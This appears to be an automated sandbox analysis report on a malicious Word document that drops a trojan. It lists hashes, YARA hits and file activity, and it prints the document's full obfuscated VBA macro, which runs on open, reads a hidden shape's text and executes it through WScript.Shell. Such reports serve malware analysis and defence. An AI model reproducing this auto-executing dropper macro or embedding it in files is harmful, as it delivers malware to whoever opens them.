6dd9d1ae...a9d7 | Files
VTI SCORE: 100/100
Dynamic Analysis Report
Classification: Trojan, Dropper, Downloader

6dd9d1ae591aa1c238d27b7d29b4d16775e02350637efc7659a7de6b062aa9d7 (SHA256)

Documento.doc

Word Document

Created at 2018-11-24 01:38:00

Notifications (1/1)

The operating system was rebooted during the analysis.

Filename C:\Users\aETAdzjz\Desktop\Documento.doc
Category Sample File
Type Word Document
Severity Blacklisted
Mime Type application/msword
File Size 87.50 KB
MD5 7bafd5f76166ab14d8f649f5ce1598eb
SHA1 f38c3bcca561cd47d214dd5a4cf7aeabdfa855e3
SHA256 6dd9d1ae591aa1c238d27b7d29b4d16775e02350637efc7659a7de6b062aa9d7
SSDeep 768:AmkOAXVucRFoqkp59YBvLdTv9ReVi4eFov5UHRFBn+1ooSA8xNhHhvWmXl3fkZN:gOAXocn1kp59gxBK85fBn+aogvVMb
File Reputation Information
Severity Blacklisted
First Seen 2018-11-23 22:33 (UTC+1)
Last Seen 2018-11-24 00:13 (UTC+1)
Names Script-Macro.Trojan.F04ie00kn18
Families F04ie00kn18
Classification Trojan
Office Information
Revision 1
Create Time 2018-11-23 20:00:00+00:00
Modify Time 2018-11-23 20:00:00+00:00
Document Information
Codepage Latin-1
Application Microsoft Office Word
App Version 16.0
Template Normal.dotm
Document Security SecurityFlag.NONE
Page Count 1
Line Count 1
Paragraph Count 1
Word Count 2
Character Count 13
Chars With Spaces 14
Heading Pairs Title
scale_crop False
shared_doc False
VBA Macros (1)
Macro #1: dUwEOEHTNVszmI
Attribute VB_Name = "dUwEOEHTNVszmI"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
   On Error Resume Next
Select Case HSwlYD
         Case 257757641
            ktwci = 122407563
            oBEMov = CVKNEqC
            duDONW = 174492233
         Case 195417733
            iLiLuJo = ChrW(118414687)
            tltuC = CDate(342035667)
            iPcbKz = 319788673
      End Select
QQBYP = 34205939 + CByte(OXjicMNHM - Sqr(vzzQais)) * wiHzC - iOiuiI * CzAXVO / CDate(132798842) * 154488641 * 29085208 / (140562981 - Sin(47931546))
   On Error Resume Next
Select Case PGAvQJW
         Case 16120916
            MzVACum = 93186137
            nWRkjYTZ = qPhEKGahm
            YHWXG = 150069403
         Case 130871712
            ddNwRiOHP = ChrW(53480062)
            WcbrMfn = CDate(319101424)
            oOZUI = 225439692
      End Select
cRzKNQaq = 313295866 + CByte(tzzpCrSC - Sqr(bzQKrT)) * LIPDtoj - mqPwRGBkv * mpzSmWH / CDate(118483228) * 294822573 * 42734003 / (287773345 - Sin(79917165))
Set qnESb = Shapes("VEwXcPHJQ")
   On Error Resume Next
Select Case WCiCrK
         Case 94959251
            ZVpNW = 338396254
            LCwuUlM = XYOzQDUXd
            zLSiZs = 241308022
         Case 17750352
            oOYwONG = ChrW(280063780)
            JvFaKJKi = CDate(192156672)
            wBFwM = 305015506
      End Select
oDhdGKR = 67835489 + CByte(dzZAmKM - Sqr(OhNYBITu)) * aEaiQL - rZCJF * lnQmf / CDate(74574645) * 33232748 * 187661887 / (160391988 - Sin(263751666))
   On Error Resume Next
Select Case bCcSwItt
         Case 62958939
            qTfbQTYSq = 241712008
            huwnG = kOztD
            qMWqiKMTK = 212089469
         Case 154779694
            bjsuKFjv = ChrW(269225751)
            uHjfsFIi = CDate(66601943)
            nVoOt = 194479237
      End Select
IdRqBWJMa = 72392160 + CByte(EtKHJJSOJ - Sqr(RHKfW)) * zFrdAjP - RXrslXS * uSaQrj / CDate(79700448) * 205082066 * 316594134 / (208433688 - Sin(132135653))
   On Error Resume Next
Select Case XjTLjk
         Case 272466793
            iHoYSFt = 30910577
            wwahHwOZ = HHAvw
            RKkFTpj = 7829555
         Case 166312401
            zPFOo = ChrW(280412632)
            GTdiXlQ = CDate(248379269)
            mjchX = 259761430
      End Select
MGIUn = 247324762 + CByte(MwBZJiIKL - Sqr(ducVtu)) * UUODDYr - KGsIjWqU * QlWLHDw / CDate(182868611) * 137068485 * 74934513 / (25246229 - Sin(195035003))
   On Error Resume Next
Select Case vPJlFddU
         Case 83662727
            GrDRw = 161097481
            miwzJ = LwWiJEvTr
            aIWXqlkw = 173026373
         Case 173062759
            iobZdiJ = ChrW(159326751)
            zmmVzojv = CDate(129334447)
            RnOEcJ = 171647089
      End Select
MAuAW = 231073262 + CByte(hIuJjZ - Sqr(vKnoWBZB)) * pcJJm - kzQDdz * mzPDAQj / CDate(270004175) * 249278613 * 257141300 / (283510404 - Sin(206443375))
NGHcX = "" + MjATXo + JozcQC + qnESb.TextFrame.TextRange.Text + nZBEIYNN + biNnGz + vwWWzl
   On Error Resume Next
Select Case EFLQMF
         Case 60402980
            joEpW = 64204107
            MDHAZ = nkSoBTpEI
            jMsOzOtqT = 14010629
         Case 238657475
            FoFrBN = ChrW(250379425)
            cUBaQV = CDate(299587719)
            LlTzbsY = 187766084
      End Select
uHwJRhX = 51601780 + CByte(idjJRcS - Sqr(TLLSwiUSi)) * iklMPcOH - nBKnd * qqPrCT / CDate(283450354) * 217961172 * 206113423 / (166769425 - Sin(87462931))
   On Error Resume Next
Select Case ajUsY
         Case 214145158
            roHRp = 119799939
            rAcul = dfhMTK
            OwfKZazH = 276571149
         Case 316614470
            qQuUBzYw = ChrW(239035644)
            FXZvzBdu = CDate(10672070)
            YOzms = 58436433
      End Select
rPSzBDsDV = 132102376 + CByte(ikoWa - Sqr(IaGPcZVMo)) * KcRHbsAj - RnETjrch * QRTCnEd / CDate(119055128) * 16611440 * 220984291 / (101507220 - Sin(275546596))
   On Error Resume Next
Select Case aKcJPzvpp
         Case 303616761
            mqiYwQq = 332337074
            GLDbHaXO = oKwJQD
            NJBtaLCJZ = 196645553
         Case 230287373
            OhRUNspO = ChrW(47031918)
            BoZhW = CDate(6763974)
            ddZiajHp = 30767910
      End Select
vJtCdr = 244440343 + CByte(lXpiQaprL - Sqr(MUsoB)) * vAJInwJ - JfuFNzXw * hlduuMwo / CDate(230627991) * 157094940 * 341266232 / (187077992 - Sin(241141116))
Set bJZMhfmkz = GetObject("new:72C24DD5-D70A-438B-8A42-98424B88AFB8")
   On Error Resume Next
Select Case mUrst
         Case 186451845
            vIQDrIjan = 163009547
            CZYXzh = VijHnu
            iYnrsbcRC = 6520647
         Case 316895163
            hjfYiU = ChrW(310809253)
            bnjOV = CDate(62228553)
            XzMnVWE = 55511792
      End Select
sjvznkWX = 177402935 + CByte(AlpGCmrs - Sqr(vsYWiAF)) * qNapdX - fvZzOrQIo * IohqKBdd / CDate(212186606) * 86648906 * 278037853 / (132435848 - Sin(83846958))
   On Error Resume Next
Select Case BlHJUCk
         Case 111496066
            jKppXQJl = 323244506
            iiLurA = TjjksEFPD
            VEXBVWNbs = 141762667
         Case 256186244
            uOCrcTtq = ChrW(277976096)
            JaiAhE = CDate(283733543)
            jZUao = 214065081
      End Select
SNHzTzi = 48045115 + CByte(pViBcmVM - Sqr(FvwSUpIkl)) * NSTZVRJF - sXPiTBKL * qdwDHbi / CDate(240638640) * 191579159 * 604223 / (295659657 - Sin(121480391))
   On Error Resume Next
Select Case nwsTzj
         Case 233460576
            CnFCkEiE = 179595011
            IUQPnofEd = NcnzapW
            wSpadiBBv = 236688675
         Case 266889696
            JLiMCvDX = ChrW(73742834)
            nuGOb = CDate(171529493)
            IbvhlGJFi = 282633276
      End Select
OmtvPuLB = 300174018 + CByte(vflziui - Sqr(TODbBnItB)) * FZHTESJ - KsiMDZj * NwJiCLi / CDate(71392612) * 100343537 * 184342520 / (221827915 - Sin(252803337))
Const wtMkT = 0
   On Error Resume Next
Select Case iGjXmlKnA
         Case 331244510
            laDnP = 157788500
            tzFul = FoljNcXON
            cAbKZPVni = 4150645
         Case 247283387
            KXBzfnpAu = ChrW(260927616)
            mSzzbZY = CDate(174286658)
            YdbnnNai = 184092140
      End Select
LkLIiO = 224433025 + CByte(wkZMCo - Sqr(psbPuOK)) * zYjvNMS - KZcbkb * TltLb / CDate(274542214) * 98394300 * 81551298 / (178637397 - Sin(255809039))
bJZMhfmkz.Run@ NGHcX, wtMkT
   On Error Resume Next
Select Case NEHTiuYJB
         Case 294796856
            DkoKE = 201904601
            VonZQSdV = VwZhO
            LSHPOiH = 107961806
         Case 242020974
            KCiVH = ChrW(296419237)
            fUjDFn = CDate(264476594)
            pNsDNcLu = 188883186
      End Select
VDoQCOY = 20614948 + CByte(GPvzuch - Sqr(MiWFfTbYV)) * NXYwIF - lpaORVfCO * YuNwafhw / CDate(103105344) * 38646926 * 130561702 / (282964539 - Sin(235409846))
   On Error Resume Next
Select Case RAZAaOlmq
         Case 244152187
            ASZiWtJO = 266942196
            LSvBmTzH = KctmThnE
            rbLWKLYH = 5540673
         Case 232215129
            aJKVQ = ChrW(35190852)
            dznvmfCa = CDate(22551452)
            jGzjp = 177185066
      End Select
MVpHjdi = 121320173 + CByte(DNBRYW - Sqr(zJFvvp)) * UkIQbumU - inIuQatW * cWboY / CDate(247911660) * 232130652 * 66118830 / (291445427 - Sin(325336249))
End Sub

YARA Matches
Rule Name Rule Description Classification Severity
Document_Contains_Execution_Commands Execution commands inside a document; possible dropper - 3/5
Document_Contains_Execution_Commands Execution commands inside a document; possible dropper - 3/5

Filename C:\Users\aETAdzjz\AppData\Local\Temp\jtA.exe
Category Created File
Type Binary
Severity Blacklisted
Also Known As c:\users\aetadzjz\appdata\local\microsoft\windows\cofiretlnt.exe (Created File)
Mime Type application/x-dosexec
File Size 132.00 KB
MD5 912807d798d35323a534fdb59399a9b0
SHA1 2060d9f147311fdeec4de5f5d940b7a6f849846d
SHA256 78ccba1d9e5d32658ce4cd4b2f8a8be65c6aa6a4f4eec2016777afb3a50ac843
SSDeep 3072:ePsv/P6gmhkFDDQKSZ4k5AF6xIsawMlkgu866:S9QD+zyF6xIsaFXP
ImpHash 83eb829a030547eb063d860f40f8e0c6
File Reputation Information
Severity Blacklisted
First Seen 2018-11-23 20:48 (UTC+1)
Last Seen 2018-11-23 21:02 (UTC+1)
Names Win32.Trojan.Encpk
Families Encpk
Classification Trojan
PE Information
Image Base 0x400000
Entry Point 0x403420
Size Of Code 0x3000
File Type executable
Subsystem windows_gui
Machine Type i386
Compile Timestamp 1995-11-13 23:08:05+00:00
Version Information (5)
Key Value
- -
InternalName o
CompanyName -
FileVersion -
FileDescription ODBC
Sections (7)
Name Virtual Address Virtual Size Raw Data Size Raw Data Offset Flags Entropy
sijJ 0x401000 0x261a 0x3000 0x1000 cnt_code, mem_execute, mem_read 5.71
.yk 0x404000 0x6f0 0x1000 0x4000 cnt_initialized_data, mem_read 2.31
.data 0x405000 0x2ec4 0x1000 0x5000 cnt_initialized_data, mem_read, mem_write 3.95
DATA 0x408000 0x1a33 0x2000 0x6000 cnt_initialized_data, mem_read, mem_write 7.13
CONST 0x40a000 0x165ec 0x17000 0x8000 cnt_initialized_data, mem_read, mem_write 7.93
.rsrc 0x421000 0x590 0x1000 0x1f000 cnt_initialized_data, mem_read 1.32
J 0x422000 0x594 0x1000 0x20000 cnt_initialized_data, mem_discardable, mem_read 2.91
Imports (3)
KERNEL32.dll (3)
API Name Ordinal IAT Address Thunk RVA Thunk Offset Hint
lstrlenW 0x0 0x404008 0x4610 0x4610 0x54e
lstrcpyW 0x0 0x40400c 0x4614 0x4614 0x548
GetCommandLineW 0x0 0x404010 0x4618 0x4618 0x187
USER32.dll (6)
API Name Ordinal IAT Address Thunk RVA Thunk Offset Hint
GetFocus 0x0 0x404018 0x4620 0x4620 0x12c
IsWindowVisible 0x0 0x40401c 0x4624 0x4624 0x1e0
GetKeyState 0x0 0x404020 0x4628 0x4628 0x13d
SetCursorPos 0x0 0x404024 0x462c 0x462c 0x28a
SetCapture 0x0 0x404028 0x4630 0x4630 0x280
GetScrollPos 0x0 0x40402c 0x4634 0x4634 0x176
ESENT.dll (1)
API Name Ordinal IAT Address Thunk RVA Thunk Offset Hint
JetUpdate 0x0 0x404000 0x4608 0x4608 0x14b
Filename c:\users\aetadzjz\appdata\local\microsoft\windows\temporary internet files\content.ie5\index.dat
Category Modified File
Type Stream
Severity Unknown
Mime Type application/octet-stream
File Size 48.00 KB
MD5 0d7742564c1bf905226155ddc8801d2b
SHA1 72fd26e88b22a795f79e85703fb4a6ce40a994e0
SHA256 91425e000a3385e9c11c19ed0756d6add1f6e049de221c21c9b49873ecb278da
SSDeep 48:qHv5Jyik0i5HXWyAl7UGAnwniGhAnwwoSHXl16YSYP5lPrCoNqK5B5NA+KNi3bR/:qH7EH3WyBcaUMz3P5s+XA8dRTwLDP
Filename c:\users\aetadzjz\appdata\roaming\microsoft\windows\cookies\index.dat
Category Modified File
Type Stream
Severity Unknown
Mime Type application/octet-stream
File Size 32.00 KB
MD5 b25ed5680eaebd743130ba81c6fa3e7f
SHA1 bdd244a2878fce8ddd7b97a1ae4ed6dc6f38bd17
SHA256 cd34c6d5341fa3554bf696d02934877f38e196bdef1d30720a53f923892b7779
SSDeep 12:qjUXZ4OE32Y3XckQslQKy3gTLPrOLWlrOu933ekIQ3rIQbq93ILtrOLWlrOR:qjU6AXkQwQc3rOirOwekIyrIUZrOirO
Filename c:\users\aetadzjz\appdata\local\microsoft\windows\history\history.ie5\index.dat
Category Modified File
Type Stream
Severity Unknown
Mime Type application/octet-stream
File Size 64.00 KB
MD5 29205bc6727f0b2b394d25d0018c253d
SHA1 486aa84638d334c0d96aa32d0bf05638ee10deaa
SHA256 5b8533df6abc601a53ad41667ee7f14dccaa08505bb4aae0ff72dae34b813d8d
SSDeep 96:qvzEMiozzcwjQ2ubh9NdeigWEsy7X66irdu0f2VRozqAUttkqYY1Ig9tPCRT8:YzV8TQ76rdu9fAwYOM
Function Logfile

This feature requires an online connection to the VMRay backend.

An offline version with limited functionality is also provided.
The offline version is supported only in Mozilla Firefox with the setting "security.fileuri.strict_origin_policy" deactivated.